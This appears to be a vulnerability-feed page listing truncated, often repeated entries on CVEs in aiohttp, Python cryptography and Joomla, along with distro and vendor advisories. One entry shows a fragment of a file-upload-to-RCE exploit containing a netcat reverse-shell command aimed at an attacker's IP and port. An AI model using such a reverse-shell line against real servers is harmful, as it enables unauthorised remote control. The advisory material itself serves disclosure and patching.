Exploit for Improper Access Control in Joomla Joomla\!

This is a POC for CVE-2023-23752 written in Python...

Design/Logic Flaw

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation made it possible for an attacker to modify the HTTP request e.g. to insert a new header or create a new HTTP request if the attacker controls the HTTP version. The vulnerability only occurs if the...

PYSEC-2023-250

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation made it possible for an attacker to modify the HTTP request e.g. to insert a new header or create a new HTTP request if the attacker controls the HTTP version. The vulnerability only occurs if the...

CVE-2023-49081 aiohttp's ClientSession is vulnerable to CRLF injection via version

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation made it possible for an attacker to modify the HTTP request e.g. to insert a new header or create a new HTTP request if the attacker controls the HTTP version. The vulnerability only occurs if the...

CVE-2023-49081

CVE-2023-49081 affects aiohttp (HTTP header/HTTP version validation issues) with remediation across multiple vendors: Debian advisories show fixes for python-aiohttp (Debian 11 bullseye: 3.7.4-1+deb11u1; DSA-5828-1 fixes to 3.8.4-1+deb12u1), IBM Storage Fusion bulletin requires upgrading to 2.8.0...

CVE-2023-49081

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation made it possible for an attacker to modify the HTTP request e.g. to insert a new header or create a new HTTP request if the attacker controls the HTTP version. The vulnerability only occurs if the...

CVE-2023-49081 aiohttp's ClientSession is vulnerable to CRLF injection via version

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation made it possible for an attacker to modify the HTTP request e.g. to insert a new header or create a new HTTP request if the attacker controls the HTTP version. The vulnerability only occurs if the...

[SECURITY] Fedora 38 Update: python-gstreamer1-1.22.7-1.fc38

This module contains PyGObject overrides to make it easier to write applications that use GStreamer 1.x in Python...

Online Student Clearance System 1.0 Shell Upload Exploit

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

Security Bulletin: Multiple security vulnerabilities are addressed with IBM Business Automation Manager Open Editions 8.0.4-IF001

Summary In addition to updates of open source dependencies, the following security vulnerabilities are addressed with IBM Business Automation Manager Open Editions 8.0.4-IF001. Vulnerability Details CVEID:CVE-2023-22025 DESCRIPTION: An unspecified vulnerability in Oracle Java SE, Oracle GraalVM...

CVE-2023-49082

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation makes it possible for an attacker to modify the HTTP request e.g. insert a new header or even create a new HTTP request if the attacker controls the HTTP method. The vulnerability occurs only if th...

PYSEC-2023-251

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation makes it possible for an attacker to modify the HTTP request e.g. insert a new header or even create a new HTTP request if the attacker controls the HTTP method. The vulnerability occurs only if th...

CVE-2023-49082

CVE-2023-49082 : aiohttp contains improper validation that can enable an attacker to modify the HTTP request (for example inserting headers) or create a new HTTP request when the attacker can control the HTTP method. The impact is described as enabling request modification and potential request s...

CVE-2023-49082 aiohttp's ClientSession is vulnerable to CRLF injection via method

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation makes it possible for an attacker to modify the HTTP request e.g. insert a new header or even create a new HTTP request if the attacker controls the HTTP method. The vulnerability occurs only if th...

CVE-2023-49083

cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Calling loadpempkcs7certificates or loadderpkcs7certificates could lead to a NULL-pointer dereference and segfault. Exploitation of this vulnerability poses a serious risk of Denial of Service...

CVE-2023-49083

The CVE-2023-49083 issue affects the Python package cryptography, where calling load_pem_pkcs7_certificates or load_der_pkcs7_certificates can trigger a NULL dereference and segfault, leading to potential DoS during PKCS7 deserialization. Affected software is the Python cryptography library; impa...

CVE-2023-49083

cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Calling loadpempkcs7certificates or loadderpkcs7certificates could lead to a NULL-pointer dereference and segfault. Exploitation of this vulnerability poses a serious risk of Denial of Service...

Exploit for Improper Access Control in Joomla Joomla\!

Usage...

python-werkzeug: high resource consumption leading to denial of service

A resource consumption flaw was found in python-werkzeug. If a specially crafted file is uploaded by a remote attacker, it may cause a denial of service...

[SECURITY] Fedora 37 Update: python-geopandas-0.14.1-1.fc37

GeoPandas is a project to add support for geographic data to Pandas objects. The goal of GeoPandas is to make working with geospatial data in Python easie r. It combines the capabilities of Pandas and Shapely, providing geospatial operations in Pandas and a high-level interface to multiple...